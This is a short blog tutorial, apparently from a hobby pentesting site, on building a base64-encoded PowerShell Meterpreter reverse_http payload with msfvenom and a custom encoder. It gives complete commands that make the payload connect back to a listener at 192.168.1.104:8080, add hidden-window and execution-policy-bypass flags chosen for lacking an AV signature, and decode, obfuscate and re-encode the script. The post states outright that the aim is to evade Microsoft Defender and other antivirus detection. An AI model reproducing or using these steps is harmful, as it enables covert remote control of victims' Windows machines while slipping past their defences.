Decode/Encode powershell payload – base64



In this post I will describe you how you can decode base64 string and encode it back. By default msfvenom does not have base64 encoder for powershell script. So, the first thing is that we need to create encoder and add it in metasploit folder.

Here is the link for encoder created in ruby. Just download it and add it to metasploit folder. In Kali Linux this folder is located in /usr/share/metasploit-framework/modules/encoders. To confirm that the encoder is on the right place, check it with the next command: msfvenom –list encoders

Link: https://github.com/pr0xy-8L4d3/powershell-base64-encoder

Here is example how we can create powershell base64 encoded payload:

msfvenom –payload windows/meterpreter/reverse_http LHOST=192.168.1.104 LPORT=8080 –format psh –smallest | msfvenom –payload – –platform win –arch x86 –encoder base64 NOEXIT SYSWOW64

In this command I added new options NOEXIT, which will include -W Hidden -nop -ep bypass -NoExit to the final powershell command. This is one of the powershell syntaxes combination for which I found thatdoes not have signature in data base. The second one SYSWOW64 uses32-bit powershell.exe on 64-bit windows. This encoder was not compiled from scratch by me. I just modified encoder by Didier Stevens to my needs.

So to decode the encoded string and get raw powershell script, we can use following command:

echo ‘<encoded_string>’ | base64 -d

The reason why I should decode that string is, that I can additionally obfuscate it or modify to my needs, and consequently avoid microsoft defender or any other AV detection. Of course, after that we need to encode it back.

To encode the powershell script, save the raw script to the random file and use the following command:

msfvenom -p generic/custom PAYLOADFILE=/root/Desktop/script.bat -a x86 –platform win -e base64 NOEXIT SYSWOW64

That’s it. This is the way how we decode base64 existent powershell string and encode it back.

Please follow and like us:
error

Add a Comment

Follow by Email
Facebook
Twitter